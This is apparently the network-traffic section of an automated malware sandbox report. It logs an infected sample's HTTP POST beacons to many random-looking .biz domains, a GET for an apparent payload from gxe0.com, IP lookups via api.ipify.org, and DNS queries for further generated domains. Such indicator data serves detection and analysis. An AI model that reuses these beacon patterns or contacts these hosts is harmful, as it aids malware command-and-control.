                    Source: global trafficHTTP traffic detected: POST /twv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /sfduvqthq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /oitokksbsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rmu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ajqmmfcm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /txgdoagkkmvqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /wmyvrothcg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dqpygue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ubrpiugbci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qjkfpfdycqfln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /vauoordpmpgaykv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vtk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jsmhknoucgib HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /udyyttdfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /rvwkmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /yfqsba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /emfmvfownawowh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dgxlfefuhlec HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /vj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /txfroxnfrj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ptd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /wm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fuqbdfcow HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /binfxyplqyoumy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tkvhoyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /dafungtde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tgphsmbcvwmuwmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /nnsajrfcymu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /dqxhnesyyna HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ghhknbcvfb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /met HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /qtbrykoecwonf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /apsbtqhunyqqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /pgnqnbmeojw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /onutm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /sjpfgfxfdnggnnio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /rntyad HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /vbngsfyw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /e HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /isfkmckm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /xc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fwkhevjnywgrfjvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qqnj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: gxe0.com
                    Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                    Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                    Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                    Source: global trafficDNS traffic detected: DNS query: s82.gocheapweb.com
                    Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                    Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                    Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                    Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                    Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                    Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                    Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                    Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                    Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                    Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                    Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                    Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                    Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                    Source: global trafficDNS traffic detected: DNS query: deoci.biz
                    Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                    Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                    Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                    Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                    Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                    Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                    Source: global trafficDNS traffic detected: DNS query: myups.biz
                    Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                    Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                    Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                    Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                    Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                    Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
